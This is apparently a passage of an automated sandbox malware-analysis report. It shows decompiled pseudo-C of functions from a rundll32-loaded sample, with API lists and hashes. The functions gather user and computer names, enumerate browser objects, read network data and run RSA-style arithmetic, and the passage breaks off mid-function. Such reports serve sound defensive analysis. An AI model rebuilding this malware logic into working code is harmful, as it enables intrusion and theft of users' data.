                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          • GetUserNameW.ADVAPI32(00000000,04FD520E), ref: 04FD61B4
                                          • GetComputerNameW.KERNEL32(04FD520E,?), ref: 04FD61D7
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04FD520E,00000000,04FD5210,00000000,00000000,?,?,04FD520E), ref: 04FD61FA
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                          • String ID:
                                          • API String ID: 3850880919-0
                                          • Opcode ID: 66d86809d97fbdcd01b60fd6b5a91c51a7452ef8e399270902d8dc696768ef92
                                          • Instruction ID: 08437082fc7d72008a89308a0c9c3dde83b35dd0766c3a7659a5d2078d6dc29e
                                          • Opcode Fuzzy Hash: 66d86809d97fbdcd01b60fd6b5a91c51a7452ef8e399270902d8dc696768ef92
                                          • Instruction Fuzzy Hash: 1B21B8B6D41208FFDB11DFE5D9889AEBBBEEF44304B5444AAE501E7200E634AB45DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E04FD62CD(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
                                          				char _v5;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				char _t28;
                                          				void* _t36;
                                          				void* _t41;
                                          				char* _t42;
                                          				void* _t44;
                                          				void* _t49;
                                          				void* _t50;
                                          				int _t51;
                                          				int _t54;
                                          				void* _t55;
                                          
                                          				_t49 = _a4;
                                          				_t55 = __eax;
                                          				_v12 = 0xb;
                                          				if(_t49 != 0 && __eax != 0) {
                                          					_t5 = _t55 - 1; // -1
                                          					_t42 = _t49 + _t5;
                                          					_t28 =  *_t42;
                                          					_v5 = _t28;
                                          					 *_t42 = 0;
                                          					__imp__(_a8, _t41);
                                          					_v16 = _t28;
                                          					_t50 =  *0x4fdd114(_t49, _a8);
                                          					if(_t50 != 0) {
                                          						 *_t42 = _v5;
                                          						_t44 = RtlAllocateHeap( *0x4fdd238, 0, _a16 + __eax);
                                          						if(_t44 == 0) {
                                          							_v12 = 8;
                                          						} else {
                                          							_t51 = _t50 - _a4;
                                          							memcpy(_t44, _a4, _t51);
                                          							_t36 = memcpy(_t44 + _t51, _a12, _a16);
                                          							_t45 = _v16;
                                          							_t54 = _a16;
                                          							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
                                          							 *_a20 = _t44;
                                          							_v12 = _v12 & 0x00000000;
                                          							 *_a24 = _t55 - _v16 + _t54;
                                          						}
                                          					}
                                          				}
                                          				return _v12;
                                          			}

                                          APIs
                                          • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 04FD6301
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04FD632D
                                          • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 04FD6341
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 04FD6350
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 04FD636B
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 69d6f70a1b1260c141680286e5ed8f22f90324d368d8a33d28e4fe51b1cc6e9c
                                          • Instruction ID: 6f7ed6422076e99df25cef0bd441e2f72bdd86ead40dda1bf9277b2bb3f48974
                                          • Opcode Fuzzy Hash: 69d6f70a1b1260c141680286e5ed8f22f90324d368d8a33d28e4fe51b1cc6e9c
                                          • Instruction Fuzzy Hash: 52219076900249AFDF019FA9C844ADEBF7AEF85304F098055EC44AB304C735E916CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E04FD9FE7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                          				void* __esi;
                                          				long _t10;
                                          				void* _t18;
                                          				void* _t22;
                                          
                                          				_t9 = __eax;
                                          				_t22 = __eax;
                                          				if(_a4 != 0 && E04FD6B6E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                          					L9:
                                          					return GetLastError();
                                          				}
                                          				_t10 = E04FDA96C(_t9, _t18, _t22, _a8);
                                          				if(_t10 == 0) {
                                          					ResetEvent( *(_t22 + 0x1c));
                                          					ResetEvent( *(_t22 + 0x20));
                                          					_push(0);
                                          					_push(0);
                                          					_push(0xffffffff);
                                          					_push(0);
                                          					_push( *((intOrPtr*)(_t22 + 0x18)));
                                          					if( *0x4fdd12c() != 0) {
                                          						SetEvent( *(_t22 + 0x1c));
                                          						goto L7;
                                          					} else {
                                          						_t10 = GetLastError();
                                          						if(_t10 == 0x3e5) {
                                          							L7:
                                          							_t10 = 0;
                                          						}
                                          					}
                                          				}
                                          				if(_t10 == 0xffffffff) {
                                          					goto L9;
                                          				}
                                          				return _t10;
                                          			}

                                          APIs
                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04FD66AF,?,?,00000000,00000000), ref: 04FDA021
                                          • ResetEvent.KERNEL32(?), ref: 04FDA026
                                          • GetLastError.KERNEL32 ref: 04FDA03E
                                          • GetLastError.KERNEL32(?,?,00000102,04FD66AF,?,?,00000000,00000000), ref: 04FDA059
                                            • Part of subcall function 04FD6B6E: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04FDA006,?,?,?,?,00000102,04FD66AF,?,?,00000000), ref: 04FD6B7A
                                            • Part of subcall function 04FD6B6E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04FDA006,?,?,?,?,00000102,04FD66AF,?), ref: 04FD6BD8
                                            • Part of subcall function 04FD6B6E: lstrcpy.KERNEL32(00000000,00000000), ref: 04FD6BE8
                                          • SetEvent.KERNEL32(?), ref: 04FDA04C
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1449191863-0
                                          • Opcode ID: 41c0d401d52f84321d03a65e2ff66f37782a1edd4d88e1db27598692421a6961
                                          • Instruction ID: f920f33c3d17427263b42fab5f06127073c8415e164634a2d3f2345554379bd2
                                          • Opcode Fuzzy Hash: 41c0d401d52f84321d03a65e2ff66f37782a1edd4d88e1db27598692421a6961
                                          • Instruction Fuzzy Hash: 4A01A231900200ABEB316E70DC48F5BB7A7FF44764F184A24F651D10E0D725F816E669
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04FD6A7F(intOrPtr _a4) {
                                          				void* _t2;
                                          				unsigned int _t4;
                                          				void* _t5;
                                          				long _t6;
                                          				void* _t7;
                                          				void* _t15;
                                          
                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                          				 *0x4fdd26c = _t2;
                                          				if(_t2 == 0) {
                                          					return GetLastError();
                                          				}
                                          				_t4 = GetVersion();
                                          				if(_t4 != 5) {
                                          					L4:
                                          					if(_t15 <= 0) {
                                          						_t5 = 0x32;
                                          						return _t5;
                                          					}
                                          					L5:
                                          					 *0x4fdd25c = _t4;
                                          					_t6 = GetCurrentProcessId();
                                          					 *0x4fdd258 = _t6;
                                          					 *0x4fdd264 = _a4;
                                          					_t7 = OpenProcess(0x10047a, 0, _t6);
                                          					 *0x4fdd254 = _t7;
                                          					if(_t7 == 0) {
                                          						 *0x4fdd254 =  *0x4fdd254 | 0xffffffff;
                                          					}
                                          					return 0;
                                          				}
                                          				if(_t4 >> 8 > 0) {
                                          					goto L5;
                                          				}
                                          				_t15 = _t4 - _t4;
                                          				goto L4;
                                          			}










                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04FD90D2,?), ref: 04FD6A87
                                          • GetVersion.KERNEL32 ref: 04FD6A96
                                          • GetCurrentProcessId.KERNEL32 ref: 04FD6AB2
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04FD6ACF
                                          • GetLastError.KERNEL32 ref: 04FD6AEE
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                          • String ID:
                                          • API String ID: 2270775618-0
                                          • Opcode ID: 824d31b2dc86a3759c7fe6cac995c85cfd60e8f2ad2ad1e4ed706a3a2f1df065
                                          • Instruction ID: ba1fafeae8dd3033ade5bd1421fc991e8836dcf85ecd6d73542d858c8f0ca554
                                          • Opcode Fuzzy Hash: 824d31b2dc86a3759c7fe6cac995c85cfd60e8f2ad2ad1e4ed706a3a2f1df065
                                          • Instruction Fuzzy Hash: 5AF0AF70A4234A9BFB219F74BC09B153B63E744702F04811AF582C61C0E778E852CB16
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 46%
                                          			E04FD91B5(intOrPtr* __eax) {
                                          				void* _v8;
                                          				WCHAR* _v12;
                                          				void* _v16;
                                          				char _v20;
                                          				void* _v24;
                                          				intOrPtr _v28;
                                          				void* _v32;
                                          				intOrPtr _v40;
                                          				short _v48;
                                          				intOrPtr _v56;
                                          				short _v64;
                                          				intOrPtr* _t54;
                                          				intOrPtr* _t56;
                                          				intOrPtr _t57;
                                          				intOrPtr* _t58;
                                          				intOrPtr* _t60;
                                          				void* _t61;
                                          				intOrPtr* _t63;
                                          				intOrPtr* _t65;
                                          				short _t67;
                                          				intOrPtr* _t68;
                                          				intOrPtr* _t70;
                                          				intOrPtr* _t72;
                                          				intOrPtr* _t75;
                                          				intOrPtr* _t77;
                                          				intOrPtr _t79;
                                          				intOrPtr* _t83;
                                          				intOrPtr* _t87;
                                          				intOrPtr _t103;
                                          				intOrPtr _t109;
                                          				void* _t118;
                                          				void* _t122;
                                          				void* _t123;
                                          				intOrPtr _t130;
                                          
                                          				_t123 = _t122 - 0x3c;
                                          				_push( &_v8);
                                          				_push(__eax);
                                          				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                          				if(_t118 >= 0) {
                                          					_t54 = _v8;
                                          					_t103 =  *0x4fdd2a4; // 0x254a5a8
                                          					_t5 = _t103 + 0x4fde038; // 0x3050f485
                                          					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                          					_t56 = _v8;
                                          					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                          					if(_t118 >= 0) {
                                          						__imp__#2(0x4fdc298);
                                          						_v28 = _t57;
                                          						if(_t57 == 0) {
                                          							_t118 = 0x8007000e;
                                          						} else {
                                          							_t60 = _v32;
                                          							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                          							_t87 = __imp__#6;
                                          							_t118 = _t61;
                                          							if(_t118 >= 0) {
                                          								_t63 = _v24;
                                          								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                          								if(_t118 >= 0) {
                                          									_t130 = _v20;
                                          									if(_t130 != 0) {
                                          										_t67 = 3;
                                          										_v64 = _t67;
                                          										_v48 = _t67;
                                          										_v56 = 0;
                                          										_v40 = 0;
                                          										if(_t130 > 0) {
                                          											while(1) {
                                          												_t68 = _v24;
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												_t123 = _t123;
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                          												if(_t118 < 0) {
                                          													goto L16;
                                          												}
                                          												_t70 = _v8;
                                          												_t109 =  *0x4fdd2a4; // 0x254a5a8
                                          												_t28 = _t109 + 0x4fde0bc; // 0x3050f1ff
                                          												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                          												if(_t118 >= 0) {
                                          													_t75 = _v16;
                                          													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                          													if(_t118 >= 0 && _v12 != 0) {
                                          														_t79 =  *0x4fdd2a4; // 0x254a5a8
                                          														_t33 = _t79 + 0x4fde078; // 0x76006f
                                          														if(lstrcmpW(_v12, _t33) == 0) {
                                          															_t83 = _v16;
                                          															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                          														}
                                          														 *_t87(_v12);
                                          													}
                                          													_t77 = _v16;
                                          													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                          												}
                                          												_t72 = _v8;
                                          												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                          												_v40 = _v40 + 1;
                                          												if(_v40 < _v20) {
                                          													continue;
                                          												}
                                          												goto L16;
                                          											}
                                          										}
                                          									}
                                          								}
                                          								L16:
                                          								_t65 = _v24;
                                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                          							}
                                          							 *_t87(_v28);
                                          						}
                                          						_t58 = _v32;
                                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                          					}
                                          				}
                                          				return _t118;
                                          			}






































                                          APIs
                                          • SysAllocString.OLEAUT32(04FDC298), ref: 04FD9205
                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04FD92E6
                                          • SysFreeString.OLEAUT32(00000000), ref: 04FD92FF
                                          • SysFreeString.OLEAUT32(?), ref: 04FD932E
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloclstrcmp
                                          • String ID:
                                          • API String ID: 1885612795-0
                                          • Opcode ID: bf1a47ee0dbbdee8045df2f475f6953229c618f79ca5e7b7c26bfb64dbd45492
                                          • Instruction ID: 2917919b929f9a03aeded2e6b8474f17ed82a29f9a450320907398872e257e43
                                          • Opcode Fuzzy Hash: bf1a47ee0dbbdee8045df2f475f6953229c618f79ca5e7b7c26bfb64dbd45492
                                          • Instruction Fuzzy Hash: E0513075D00519EFCB00DFE8C888DAEB7BAFF89705B144598E915EB260D771AD42CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 85%
                                          			E04FD7664(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				void _v92;
                                          				void _v236;
                                          				void* _t55;
                                          				unsigned int _t56;
                                          				signed int _t66;
                                          				signed int _t74;
                                          				void* _t76;
                                          				signed int _t79;
                                          				void* _t81;
                                          				void* _t92;
                                          				void* _t96;
                                          				signed int* _t99;
                                          				signed int _t101;
                                          				signed int _t103;
                                          				void* _t107;
                                          
                                          				_t92 = _a12;
                                          				_t101 = __eax;
                                          				_t55 = E04FD48F0(_a16, _t92);
                                          				_t79 = _t55;
                                          				if(_t79 == 0) {
                                          					L18:
                                          					return _t55;
                                          				}
                                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                                          				_t81 = 0;
                                          				_t96 = 0x20;
                                          				if(_t56 == 0) {
                                          					L4:
                                          					_t97 = _t96 - _t81;
                                          					_v12 = _t96 - _t81;
                                          					E04FD748A(_t79,  &_v236);
                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04FD7074(_t101,  &_v236, _a8, _t96 - _t81);
                                          					E04FD7074(_t79,  &_v92, _a12, _t97);
                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                          					_t66 = E04FD748A(_t101, 0x4fdd1b0);
                                          					_t103 = _t101 - _t79;
                                          					_a8 = _t103;
                                          					if(_t103 < 0) {
                                          						L17:
                                          						E04FD748A(_a16, _a4);
                                          						E04FD2FED(_t79,  &_v236, _a4, _t97);
                                          						memset( &_v236, 0, 0x8c);
                                          						_t55 = memset( &_v92, 0, 0x44);
                                          						goto L18;
                                          					}
                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                          					do {
                                          						if(_v8 != 0xffffffff) {
                                          							_push(1);
                                          							_push(0);
                                          							_push(0);
                                          							_push( *_t99);
                                          							L04FDB088();
                                          							_t74 = _t66 +  *(_t99 - 4);
                                          							asm("adc edx, esi");
                                          							_push(0);
                                          							_push(_v8 + 1);
                                          							_push(_t92);
                                          							_push(_t74);
                                          							L04FDB082();
                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                          								_t74 = _t74 | 0xffffffff;
                                          								_v16 = _v16 & 0x00000000;
                                          							}
                                          						} else {
                                          							_t74 =  *_t99;
                                          						}
                                          						_t106 = _t107 + _a8 * 4 - 0xe8;
                                          						_a12 = _t74;
                                          						_t76 = E04FD6FDC(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                          						while(1) {
                                          							 *_t99 =  *_t99 - _t76;
                                          							if( *_t99 != 0) {
                                          								goto L14;
                                          							}
                                          							L13:
                                          							_t92 =  &_v92;
                                          							if(E04FD15CE(_t79, _t92, _t106) < 0) {
                                          								break;
                                          							}
                                          							L14:
                                          							_a12 = _a12 + 1;
                                          							_t76 = E04FD687D(_t79,  &_v92, _t106, _t106);
                                          							 *_t99 =  *_t99 - _t76;
                                          							if( *_t99 != 0) {
                                          								goto L14;
                                          							}
                                          							goto L13;
                                          						}
                                          						_a8 = _a8 - 1;
                                          						_t66 = _a12;
                                          						_t99 = _t99 - 4;
                                          						 *(0x4fdd1b0 + _a8 * 4) = _t66;
                                          					} while (_a8 >= 0);
                                          					_t97 = _v12;
                                          					goto L17;
                                          				}
                                          				while(_t81 < _t96) {
                                          					_t81 = _t81 + 1;
                                          					_t56 = _t56 >> 1;
                                          					if(_t56 != 0) {
                                          						continue;
                                          					}
                                          					goto L4;
                                          				}
                                          				goto L4;
                                          			}






















                                          APIs
                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04FD7711
                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04FD7727
                                          • memset.NTDLL ref: 04FD77C7
                                          • memset.NTDLL ref: 04FD77D7
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memset$_allmul_aulldiv
                                          • String ID:
                                          • API String ID: 3041852380-0
                                          • Opcode ID: 973003e502924501e212cfe42879ab5c0bf7179af9717e901f0f14ec652f945e
                                          • Instruction ID: e1215baa0a9dc4a0c71190e450f5953609871bed50de0f15bc2162cbe42f97fb
                                          • Opcode Fuzzy Hash: 973003e502924501e212cfe42879ab5c0bf7179af9717e901f0f14ec652f945e
                                          • Instruction Fuzzy Hash: 26419931A00259ABEB10FFA8CC44BDE77B6EF45314F144529F915AB180E771BD568B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,00000008,75144D40), ref: 04FDA97E
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          • ResetEvent.KERNEL32(?), ref: 04FDA9F2
                                          • GetLastError.KERNEL32 ref: 04FDAA15
                                          • GetLastError.KERNEL32 ref: 04FDAAC0
                                            • Part of subcall function 04FD147E: HeapFree.KERNEL32(00000000,00000000,04FD1D11,00000000,?,?,-00000008), ref: 04FD148A
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                          • String ID:
                                          • API String ID: 943265810-0
                                          • Opcode ID: 98b2de14c2e10071e31af14266d96aa296b7490abd4cd07be7d01369006d6b77
                                          • Instruction ID: 3f32ee0b0f60819cc9cc931457b5865b6f77126fe0643ee92312532067f5ab61
                                          • Opcode Fuzzy Hash: 98b2de14c2e10071e31af14266d96aa296b7490abd4cd07be7d01369006d6b77
                                          • Instruction Fuzzy Hash: 97418175900608FFE731AFB1DD48E5B7BBFEB49700B184A19F542D1090D735A905DB25
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 39%
                                          			E04FD8F08(void* __eax) {
                                          				char _v8;
                                          				void* _v12;
                                          				intOrPtr _v16;
                                          				char _v20;
                                          				void* __esi;
                                          				intOrPtr _t36;
                                          				intOrPtr* _t37;
                                          				intOrPtr* _t39;
                                          				void* _t53;
                                          				long _t58;
                                          				void* _t59;
                                          
                                          				_t59 = __eax;
                                          				_t58 = 0;
                                          				ResetEvent( *(__eax + 0x1c));
                                          				_push( &_v8);
                                          				_push(4);
                                          				_push( &_v20);
                                          				_push( *((intOrPtr*)(_t59 + 0x18)));
                                          				if( *0x4fdd138() != 0) {
                                          					L5:
                                          					if(_v8 == 0) {
                                          						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                          						L21:
                                          						return _t58;
                                          					}
                                          					 *0x4fdd168(0, 1,  &_v12);
                                          					if(0 != 0) {
                                          						_t58 = 8;
                                          						goto L21;
                                          					}
                                          					_t36 = E04FD58BE(0x1000);
                                          					_v16 = _t36;
                                          					if(_t36 == 0) {
                                          						_t58 = 8;
                                          						L18:
                                          						_t37 = _v12;
                                          						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                          						goto L21;
                                          					}
                                          					_push(0);
                                          					_push(_v8);
                                          					_push( &_v20);
                                          					while(1) {
                                          						_t39 = _v12;
                                          						_t56 =  *_t39;
                                          						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                                          						ResetEvent( *(_t59 + 0x1c));
                                          						_push( &_v8);
                                          						_push(0x1000);
                                          						_push(_v16);
                                          						_push( *((intOrPtr*)(_t59 + 0x18)));
                                          						if( *0x4fdd138() != 0) {
                                          							goto L13;
                                          						}
                                          						_t58 = GetLastError();
                                          						if(_t58 != 0x3e5) {
                                          							L15:
                                          							E04FD147E(_v16);
                                          							if(_t58 == 0) {
                                          								_t58 = E04FD16DB(_v12, _t59);
                                          							}
                                          							goto L18;
                                          						}
                                          						_t58 = E04FD9D3A( *(_t59 + 0x1c), _t56, 0xffffffff);
                                          						if(_t58 != 0) {
                                          							goto L15;
                                          						}
                                          						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                          						if(_t58 != 0) {
                                          							goto L15;
                                          						}
                                          						L13:
                                          						_t58 = 0;
                                          						if(_v8 == 0) {
                                          							goto L15;
                                          						}
                                          						_push(0);
                                          						_push(_v8);
                                          						_push(_v16);
                                          					}
                                          				}
                                          				_t58 = GetLastError();
                                          				if(_t58 != 0x3e5) {
                                          					L4:
                                          					if(_t58 != 0) {
                                          						goto L21;
                                          					}
                                          					goto L5;
                                          				}
                                          				_t58 = E04FD9D3A( *(_t59 + 0x1c), _t53, 0xffffffff);
                                          				if(_t58 != 0) {
                                          					goto L21;
                                          				}
                                          				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                          				goto L4;
                                          			}















                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 04FD8F1E
                                          • GetLastError.KERNEL32 ref: 04FD8F37
                                            • Part of subcall function 04FD9D3A: WaitForMultipleObjects.KERNEL32(00000002,04FDAA33,00000000,04FDAA33,?,?,?,04FDAA33,0000EA60), ref: 04FD9D55
                                          • ResetEvent.KERNEL32(?), ref: 04FD8FB0
                                          • GetLastError.KERNEL32 ref: 04FD8FCB
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorEventLastReset$MultipleObjectsWait
                                          • String ID:
                                          • API String ID: 2394032930-0
                                          • Opcode ID: 45ff3e494c9265dbf8aab565fb0bae2d0d15c58e5d5a123e2a216df5f4430f5b
                                          • Instruction ID: 189da97ec73befe58fedad1f7d9e29592e7a6e02d8191e0961dad44db7afe530
                                          • Opcode Fuzzy Hash: 45ff3e494c9265dbf8aab565fb0bae2d0d15c58e5d5a123e2a216df5f4430f5b
                                          • Instruction Fuzzy Hash: E6318672A00604ABDB21AFF4DC48E5E77BBEF88354F180568E555D7190EBB0F9479710
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E04FD72F2(signed int _a4, signed int* _a8) {
                                          				void* __ecx;
                                          				void* __edi;
                                          				signed int _t6;
                                          				intOrPtr _t8;
                                          				intOrPtr _t12;
                                          				short* _t19;
                                          				void* _t25;
                                          				signed int* _t28;
                                          				CHAR* _t30;
                                          				long _t31;
                                          				intOrPtr* _t32;
                                          
                                          				_t6 =  *0x4fdd270; // 0xd448b889
                                          				_t32 = _a4;
                                          				_a4 = _t6 ^ 0x109a6410;
                                          				_t8 =  *0x4fdd2a4; // 0x254a5a8
                                          				_t3 = _t8 + 0x4fde836; // 0x61636f4c
                                          				_t25 = 0;
                                          				_t30 = E04FD6AF7(_t3, 1);
                                          				if(_t30 != 0) {
                                          					_t25 = CreateEventA(0x4fdd2a8, 1, 0, _t30);
                                          					E04FD147E(_t30);
                                          				}
                                          				_t12 =  *0x4fdd25c; // 0x4000000a
                                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04FD56A2() != 0) {
                                          					L12:
                                          					_t28 = _a8;
                                          					if(_t28 != 0) {
                                          						 *_t28 =  *_t28 | 0x00000001;
                                          					}
                                          					_t31 = E04FD1493(_t32, 0);
                                          					if(_t31 == 0 && _t25 != 0) {
                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                          					}
                                          					if(_t28 != 0 && _t31 != 0) {
                                          						 *_t28 =  *_t28 & 0xfffffffe;
                                          					}
                                          					goto L20;
                                          				} else {
